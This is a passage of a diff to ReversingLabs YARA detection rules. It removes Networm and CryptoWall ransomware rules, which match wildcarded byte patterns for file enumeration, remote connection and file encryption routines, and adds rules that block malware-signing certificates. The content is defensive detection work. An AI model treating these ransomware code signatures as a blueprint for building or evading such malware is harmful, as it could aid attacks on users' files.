license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ff9bcb9868522f9d4abf2ab9f94d5b7c9b009e5c6d0cf832c7d052f18e048b31" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13548-L13564" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "29bfe9c8b340b55a9daa2644e8d55b2b783cc95c85541732e6e0decca8c10ff6" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Networm" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files = { - 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F1 89 B5 ?? ?? ?? ?? 8B 7D ?? 33 DB - 6A ?? 59 33 C0 89 5D ?? 89 4D ?? 66 89 45 ?? 89 5D ?? 89 5D ?? 89 4D ?? 66 89 45 ?? - 68 ?? ?? ?? ?? 8B D7 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 4D ?? 3B C8 - 74 ?? 88 9D ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? - ?? ?? ?? 83 7D ?? ?? 8D 8D ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ?? - 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 66 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 8D - 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D7 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 8D - ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? - C6 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? - 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? F6 85 - ?? ?? ?? ?? ?? 8D 45 ?? 74 ?? 6A ?? 50 8B CE E8 ?? ?? ?? ?? 8B F0 85 F6 0F 85 ?? ?? - ?? ?? 8B B5 ?? ?? ?? ?? EB ?? 83 7D ?? ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 FF 15 ?? ?? - ?? ?? 85 C0 74 ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? - 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 53 FF 15 ?? ?? - ?? ?? 8B 1D ?? ?? ?? ?? FF D3 8B F0 83 FE ?? 75 ?? 83 7F ?? ?? 8B C7 72 ?? 8B 07 68 - ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 83 7F ?? ?? 72 ?? 8B 3F 57 FF 15 ?? ?? - ?? ?? 85 C0 75 ?? FF D3 8B F0 EB ?? FF 15 ?? ?? ?? ?? EB ?? 33 F6 8D 4D ?? E8 ?? ?? - ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? C2 - } - $remote_connection_p1 = { - 55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 8B 5D ?? 56 57 6A ?? 8B FA 8B F1 - FF 15 ?? ?? ?? ?? 33 C0 50 50 89 45 ?? 89 45 ?? 8D 45 ?? 50 8D 45 ?? 50 6A ?? 57 56 - FF 15 ?? ?? ?? ?? 8B D3 8B C8 E8 ?? ?? ?? ?? 83 3B ?? 8B F0 75 ?? 68 ?? ?? ?? ?? EB - ?? 81 3B ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? EB ?? 81 3B ?? ?? ?? - ?? 74 ?? 81 3B ?? ?? ?? ?? 74 ?? 85 F6 74 ?? 83 C8 ?? EB ?? 83 65 ?? ?? 8D 75 ?? 8B - 45 ?? 8B FB C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? A5 A5 A5 8B 4D ?? 5F 5E 33 CD 5B E8 ?? - ?? ?? ?? C9 C3 - } - $remote_connection_p2 = { - 55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 8B 5D ?? 56 57 6A ?? 8B FA 8B F1 - FF 15 ?? ?? ?? ?? 33 C0 50 50 50 89 45 ?? 8D 45 ?? 50 FF 75 ?? 57 56 FF 15 ?? ?? ?? - ?? 8B D3 8B C8 E8 ?? ?? ?? ?? 83 3B ?? 8B F0 75 ?? 68 ?? ?? ?? ?? EB ?? 81 3B ?? ?? - ?? ?? 75 ?? 68 ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 85 F6 74 ?? 83 C8 ?? EB ?? 83 65 ?? - ?? 8D 75 ?? 8B 45 ?? 8B FB C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? A5 A5 A5 8B 4D ?? 5F 5E - 33 CD 5B E8 ?? ?? ?? ?? C9 C3 - } - $encrypt_files_p1 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ?? - 33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 8B 45 ?? 83 F8 ?? C7 45 ?? ?? ?? ?? ?? 0F - 94 C7 83 F8 ?? 0F 94 C3 83 F8 ?? 75 ?? B8 ?? ?? ?? ?? EB ?? 0F B6 C3 83 F0 ?? 8D 04 - 45 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 6A ?? FF 76 ?? FF 15 ?? ?? ?? ?? 8B C8 89 4E ?? - 85 C9 0F 84 ?? ?? ?? ?? 84 FF 74 ?? BF ?? ?? ?? ?? EB ?? 0F B6 C3 8D 3C 45 ?? ?? ?? - ?? 8B 56 ?? 8B 46 ?? 85 D2 7C ?? 0F 8F ?? ?? ?? ?? 85 C0 72 ?? 85 D2 7C ?? 0F 8F ?? - ?? ?? ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 83 F8 ?? 74 ?? 89 55 ?? EB ?? 0F 57 C0 66 0F 13 - 45 ?? 8B 45 ?? FF 75 ?? 50 FF 75 ?? FF 75 ?? 57 51 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D - 4D ?? 89 46 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? - 59 5F 5E 5B 8B E5 5D C2 - } - $encrypt_files_p2 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 56 A1 ?? ?? ?? ?? 33 C5 - 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 83 7E ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? - ?? 8B 4D ?? 85 C9 74 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? EB ?? 8B 45 ?? 85 C0 74 ?? 0F - 8E ?? ?? ?? ?? 83 F8 ?? 7E ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? EB ?? F6 C1 ?? C7 45 ?? ?? - ?? ?? ?? B8 ?? ?? ?? ?? 0F 95 C0 40 89 45 ?? 83 7D ?? ?? 7F ?? 0F 8C ?? ?? ?? ?? 83 - 7D ?? ?? 0F 82 ?? ?? ?? ?? 83 7D ?? ?? 7F ?? 0F 8C ?? ?? ?? ?? 83 7D ?? ?? 0F 82 ?? - ?? ?? ?? 83 EC ?? 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 8D 45 ?? 8B - CE 50 E8 ?? ?? ?? ?? 8D 45 ?? 8B CE 50 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D - ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 8B E5 5D C2 ?? ?? 8D 45 ?? 6A - ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 C6 45 ?? - ?? E8 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 68 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 - C4 ?? 8D 4D ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 45 - ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 C6 - 45 ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 68 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 - } - condition: - uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) and ( all of ($remote_connection_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "NUSAAPPINSTALL(APPS INSTALLER S.L.)" and pe.signatures[i].serial=="66:51:cc:8b:48:50:d4:de:c6:19:61:50:3e:a7:95:6b" and 1436175828<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Win32_Ransomware_Cryptowall : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Cert_Blocklist_25Bef28467E4750331D2F403458113B8 : INFO FILE { meta: - description = "Yara rule that detects CryptoWall ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "06d8b106-d69a-526a-8e16-c95d39eb2993" - date = "2020-07-15" - modified = "2020-07-15" + id = "a97723cb-7814-5f08-af94-6244c1cf4145" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.CryptoWall.yara#L3-L312" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "74baa04ee506732e0bb64a77cfd2d2216fcc978f13447ef07862e0116c093c14" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13566-L13582" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "dc59fdecf60f3781e92cfe8469be2e0c1cb1cfdd3e9f9757d159667437cb37f5" score = 75 - quality = 88 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + quality = 90 + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "CryptoWall" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $v30_entrypoint = { - 55 8B EC 83 EC ?? E8 ?? ?? ?? ?? 85 C0 0F 84 9A 00 00 00 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 7E C7 45 ?? ?? ?? ?? ?? - 8D 45 ?? 50 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 65 8B 4D ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 - E8 ?? ?? ?? ?? 8B 40 ?? A3 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 - 75 19 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A - ?? 6A ?? E8 ?? ?? ?? ?? 8B 50 ?? FF D2 33 C0 8B E5 5D C2 - } - $v20_entrypoint = { - 55 8B EC 83 EC ?? E8 ?? ?? ?? ?? 85 C0 0F 84 A3 00 00 00 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 85 83 00 00 00 C7 45 ?? - ?? ?? ?? ?? 8D 45 ?? 50 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 6A 8B 4D ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 90 ?? ?? - ?? ?? FF D2 E8 ?? ?? ?? ?? 8B 40 ?? A3 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 83 C4 ?? 85 C0 75 19 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 - E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B 50 ?? FF D2 33 C0 8B E5 5D C2 - } - $v30_api_load = { - 55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 50 01 00 00 8B 45 ?? 50 E8 ?? ?? - ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 34 01 00 00 B9 ?? ?? ?? ?? 6B D1 ?? 8B 45 ?? 8B 4D ?? 03 4C 10 ?? 89 4D ?? 8B - 55 ?? 8B 45 ?? 03 42 ?? 89 45 ?? 8B 4D ?? 8B 55 ?? 03 51 ?? 89 55 ?? 8B 45 ?? 8B 4D ?? 03 48 ?? 89 4D ?? C7 45 ?? ?? ?? - ?? ?? EB 09 8B 55 ?? 83 C2 ?? 89 55 ?? 8B 45 ?? 8B 4D ?? 3B 48 ?? 0F 83 DA 00 00 00 8B 55 ?? 8B 45 ?? 8B 4D ?? 03 0C 90 - 51 E8 ?? ?? ?? ?? 83 C4 ?? 3B 45 ?? 0F 85 B7 00 00 00 BA ?? ?? ?? ?? 6B C2 ?? 8B 4D ?? 8B 54 01 ?? 8B 44 01 ?? 89 55 ?? - 89 45 ?? 8B 4D ?? 8B 55 ?? 0F B7 04 4A 8B 4D ?? 8B 14 81 3B 55 ?? 76 71 8B 45 ?? 8B 4D ?? 0F B7 14 41 8B 45 ?? 03 45 ?? - 8B 4D ?? 39 04 91 73 59 8B 55 ?? 8B 45 ?? 0F B7 0C 50 8B 55 ?? 8B 45 ?? 03 04 8A 89 45 ?? 74 3F 6A ?? 8B 4D ?? 51 E8 ?? - ?? ?? ?? 83 C4 ?? 8B 55 ?? 8D 44 02 ?? 50 8D 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8D 45 ?? 50 6A ?? 8D 4D ?? - 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 40 ?? FF D0 EB 16 8B 4D ?? 8B 55 ?? 0F B7 04 4A 8B 4D ?? 8B 55 ?? 03 14 81 89 55 ?? EB - 05 E9 0E FF FF FF 8B 45 ?? 8B E5 5D C3 - } - $v30_dll_load = { - 55 8B EC 83 EC ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 58 8B 45 ?? 8B 48 ?? 89 4D ?? 8B 55 ?? 83 C2 ?? 89 55 ?? 8B 45 - ?? 8B 08 89 4D ?? 8B 55 ?? 3B 55 ?? 74 36 8B 45 ?? 89 45 ?? 8B 4D ?? 0F B7 51 ?? D1 EA 52 8B 45 ?? 8B 48 ?? 51 E8 ?? ?? - ?? ?? 83 C4 ?? 3B 45 ?? 75 08 8B 55 ?? 8B 42 ?? EB 0C 8B 45 ?? 8B 08 89 4D ?? EB C2 33 C0 8B E5 5D C3 - } - $v30_calculate_hash = { - 55 8B EC 83 EC ?? 56 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 5E 83 7D ?? ?? 74 58 8B 45 ?? 89 45 ?? 8B 4D ?? 89 4D ?? 8B 55 - ?? 83 EA ?? 89 55 ?? 83 7D ?? ?? 74 3D 8B 45 ?? 66 8B 08 66 89 4D ?? 8B 75 ?? C1 EE ?? 0F B7 55 ?? 52 E8 ?? ?? ?? ?? 83 - C4 ?? 0F B7 C0 33 45 ?? 25 ?? ?? ?? ?? 33 34 85 ?? ?? ?? ?? 89 75 ?? 8B 4D ?? 83 C1 ?? 89 4D ?? EB AE 8B 45 ?? 83 F0 ?? - 5E 8B E5 5D C3 - } - $v30_1_find_file_1 = { - 55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 47 02 00 00 E8 ?? ?? ?? ?? 89 45 - ?? 83 7D ?? ?? 0F 84 32 02 00 00 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8B 45 ?? 50 E8 ?? ?? ?? - ?? 83 C4 ?? 8B 4D ?? 0F B7 54 41 ?? 83 FA ?? 74 16 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 68 - ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? - ?? 0F 84 B2 01 00 00 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 0F 84 84 01 00 - 00 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 8B 11 83 E2 ?? 0F 85 A0 00 00 00 C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? 50 E8 ?? ?? ?? - ?? 83 C4 ?? 85 C0 0F 85 80 00 00 00 8D 4D ?? 51 8B 55 ?? 83 C2 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 69 C7 45 ?? ?? ?? - ?? ?? 8D 45 ?? 50 8B 4D ?? 83 C1 ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 47 8B 45 ?? 50 8B 4D ?? 8B 11 52 8B - 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 75 1C 8B 4D ?? 83 C1 ?? 89 4D ?? 8B 55 ?? 8B 42 ?? 50 8B 4D ?? 51 - } - $v30_1_find_file_2 = { - E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? EB 67 8B 45 ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 - 54 C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 51 8B 55 ?? 83 C2 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 32 8B 4D ?? 51 E8 - ?? ?? ?? ?? 83 C4 ?? 85 C0 75 16 8B 55 ?? 52 8B 45 ?? 50 E8 30 FE FF FF 83 C4 ?? 03 45 ?? 89 45 ?? 8B 4D ?? 51 E8 ?? ?? - ?? ?? 83 C4 ?? 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 0F 85 CE FE FF FF 8B 55 ?? 52 E8 ?? - ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 7D ?? ?? 74 2E 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 - C4 ?? 3D ?? ?? ?? ?? 74 0E 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 89 4D ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 - ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 8B E5 5D C3 - } - $v30_2_find_file_1 = { - 55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 ( 3B | 3D ) 02 00 00 E8 ?? ?? ?? - ?? 89 45 ?? 83 7D ?? ?? 0F 84 ( 26 | 28 ) 02 00 00 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8B 45 - ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 0F B7 54 41 ?? 83 FA ?? 74 16 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? - ?? ?? ?? FF D1 68 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? - 89 45 ?? 83 7D ?? ?? 0F 84 ( A6 | A8 ) 01 00 00 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 89 45 ?? - 83 7D ?? ?? 0F 84 ( 78 | 7A ) 01 00 00 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 8B 11 83 E2 ?? 0F 85 94 00 00 00 C7 45 ?? ?? ?? ?? - ?? 8B 45 ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 78 8B 4D ?? 83 C1 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 65 C7 - 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 83 C0 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 43 8B 55 ?? 8B 02 50 8B - } - $v30_2_find_file_2 = { - 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 75 1C 8B 55 ?? 83 C2 ?? 89 55 ?? 8B 45 ?? 8B 48 ?? 51 8B 55 ?? 52 - E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? EB 67 8B 4D ?? 83 C1 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 - 54 C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 83 C0 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 32 8B 55 ?? 52 E8 - ?? ?? ?? ?? 83 C4 ?? 85 C0 75 16 8B 45 ?? 50 8B 4D ?? 51 E8 3C FE FF FF 83 C4 ?? 03 45 ?? 89 45 ?? 8B 55 ?? 52 E8 ?? ?? - ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 0F 85 DA FE FF FF 8B 45 ?? 50 E8 ?? - ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 83 7D ?? ?? 74 ( 2E | 30 ) 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 50 8B 45 ?? 50 E8 ?? ?? - ?? ?? 83 C4 ?? 3D ?? ?? ?? ?? 74 ( 0E | 10 ) 6A ?? [0-2] 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 89 55 ?? 8B 45 ?? - 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 8B E5 5D C3 - } - $v30_3_find_file_1 = { - 55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 7C 02 00 00 E8 ?? ?? ?? ?? 89 45 - ?? 83 7D ?? ?? 0F 84 67 02 00 00 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8B 45 ?? 50 E8 ?? ?? ?? - ?? 83 C4 ?? 8B 4D ?? 0F B7 54 41 ?? 83 FA ?? 74 16 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 68 - ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? - ?? 0F 84 E7 01 00 00 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 0F 84 B9 01 00 - 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 83 C1 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 91 00 00 00 8D 55 - ?? 52 8B 45 ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 7A 8B 4D ?? 8B 11 83 E2 ?? 75 70 C7 45 ?? ?? ?? ?? ?? 8D 45 - ?? 50 8B 4D ?? 83 C1 ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 49 8B 45 ?? 8B 48 ?? 51 8B 55 ?? 52 8B 45 ?? 8B - } - $v30_3_find_file_2 = { - 08 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 1C 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 4D ?? 8B 51 ?? 52 8B 45 ?? 50 E8 ?? - ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? E9 88 00 00 00 8B 55 ?? 8B 02 83 E0 ?? 74 7E 8B 4D ?? 83 79 ?? ?? - 74 75 8B 55 ?? 83 C2 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 62 C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 8B 4D ?? 83 C1 ?? 51 8B - 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 40 8B 45 ?? 50 8B 4D ?? 8B 51 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 1D 8B 45 - ?? 50 8B 4D ?? 51 E8 15 FE FF FF 83 C4 ?? 85 C0 74 09 8B 55 ?? 83 C2 ?? 89 55 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B - 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 85 C0 0F 85 AC FE FF FF 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? - ?? ?? ?? FF D2 8B 45 ?? 50 8B 4D ?? 8B 51 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 74 2E 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 - C4 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 3D ?? ?? ?? ?? 74 0E 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 89 - 45 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 8B E5 5D C3 - } - $v20_1_encrypt_file_1 = { - 55 8B EC 81 EC ?? ?? ?? ?? 56 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 99 05 00 00 8B 45 ?? - 83 38 ?? 74 1B 8B 4D ?? 83 79 ?? ?? 74 12 8B 55 ?? 83 7A ?? ?? 74 09 8B 45 ?? 83 78 ?? ?? 75 08 8B 45 ?? E9 6E 05 00 00 - 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 89 45 ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 C7 - 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? - ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 0F 84 F4 04 00 00 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? 